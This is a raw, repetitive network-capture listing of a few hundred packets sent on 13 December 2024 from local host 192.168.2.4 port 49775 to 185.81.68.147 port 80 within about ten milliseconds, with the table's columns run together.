                                                              Dec 13, 2024 07:47:45.788722038 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788758039 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788786888 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788825035 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788860083 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788887978 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788921118 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788953066 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788983107 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789017916 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789046049 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789079905 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789109945 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789144993 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789176941 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789211988 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789242029 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789277077 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789314985 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789345980 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789376974 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789411068 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789443016 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789474010 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789505959 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789540052 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789570093 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789603949 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789635897 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789674044 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789707899 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789741039 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789774895 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789808989 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789840937 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789874077 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789905071 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789937019 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789967060 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.789999962 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790030956 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790064096 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790091991 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790127993 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790158987 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790194988 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790227890 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790263891 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790293932 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790330887 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790360928 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790391922 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790422916 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790472984 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790496111 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790530920 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790558100 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790594101 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790626049 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790657043 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790690899 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790729046 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790759087 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790798903 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790831089 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790858984 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790890932 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790923119 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790951967 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.790982962 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791013002 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791050911 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791079998 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791116953 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791152954 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791188002 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791214943 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791250944 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791281939 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791325092 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791347027 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791382074 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791409969 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791441917 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791471004 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791508913 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791541100 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791572094 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791609049 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791647911 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791680098 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791716099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791740894 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791776896 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791805983 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791840076 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791871071 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791903973 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791933060 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.791964054 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792000055 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792035103 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792069912 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792105913 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792140007 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792171001 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792203903 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792236090 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792265892 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792298079 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792332888 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792365074 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792397022 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792429924 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792462111 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792496920 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792526007 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792562962 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792597055 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792632103 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792660952 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792699099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792732954 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792763948 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792794943 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792830944 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792860031 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792893887 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792924881 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792956114 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.792987108 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793023109 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793056011 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793108940 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793128967 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793159962 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793190002 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793224096 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793252945 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793287039 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793317080 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793351889 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793381929 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793416023 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793447971 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793486118 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793514013 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793549061 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793585062 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793618917 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793648958 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793683052 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793715000 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793750048 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793780088 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793812990 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793843985 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793883085 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793917894 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793947935 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.793982983 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794015884 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794047117 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794084072 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794117928 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794172049 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794208050 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794240952 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794275045 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794311047 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794344902 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794373989 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794405937 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794436932 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794469118 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794498920 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794538975 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794567108 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794600964 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794635057 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794670105 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794702053 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794738054 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794766903 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794799089 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794831038 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794862032 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794893026 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794925928 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794955015 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.794987917 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795018911 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795054913 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795085907 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795121908 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795154095 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795186043 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795219898 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795252085 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795279980 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795320034 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795339108 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795377016 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795406103 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795437098 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795466900 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795500994 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795531988 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795567989 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795599937 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795634985 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795664072 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795695066 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795727015 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795758963 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795787096 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795823097 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795850992 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795883894 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795913935 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795944929 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.795975924 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796013117 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796041965 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796076059 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796108007 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796139956 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796169043 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796200037 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796230078 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796261072 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796291113 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796322107 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796353102 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796385050 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796413898 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796449900 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796483994 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796514988 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796545029 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796578884 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796607971 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796639919 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796668053 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796700001 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796731949 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796762943 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796792984 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796824932 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796859026 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796888113 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796926022 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796957970 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.796993017 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797025919 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797058105 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797087908 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797121048 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797151089 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797183037 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797214031 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797245026 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797275066 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797307014 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797338963 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797378063 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797410011 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797441959 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797471046 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797502041 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797533035 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797564030 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797594070 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797626019 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797656059 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797687054 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797715902 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797748089 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797780991 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797813892 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797849894 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797885895 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797915936 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797954082 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.797977924 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798010111 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798041105 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798074007 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798104048 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798135042 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798163891 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798196077 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798228025 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798263073 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798295975 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798331976 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798362017 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798397064 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798425913 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798458099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798486948 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798517942 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798546076 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798578024 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798608065 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798639059 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798667908 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798702955 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798738003 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798770905 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798799038 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798835993 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798867941 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798898935 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798929930 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798960924 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.798991919 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799024105 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799052000 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799083948 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799115896 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799149990 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799180984 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799211025 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799242973 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799278021 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799309969 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799341917 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799371958 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799403906 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799433947 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799464941 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799494028 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799526930 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799556971 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799591064 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799622059 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799657106 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799685001 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.799716949 CET4977580192.168.2.4185.81.68.147
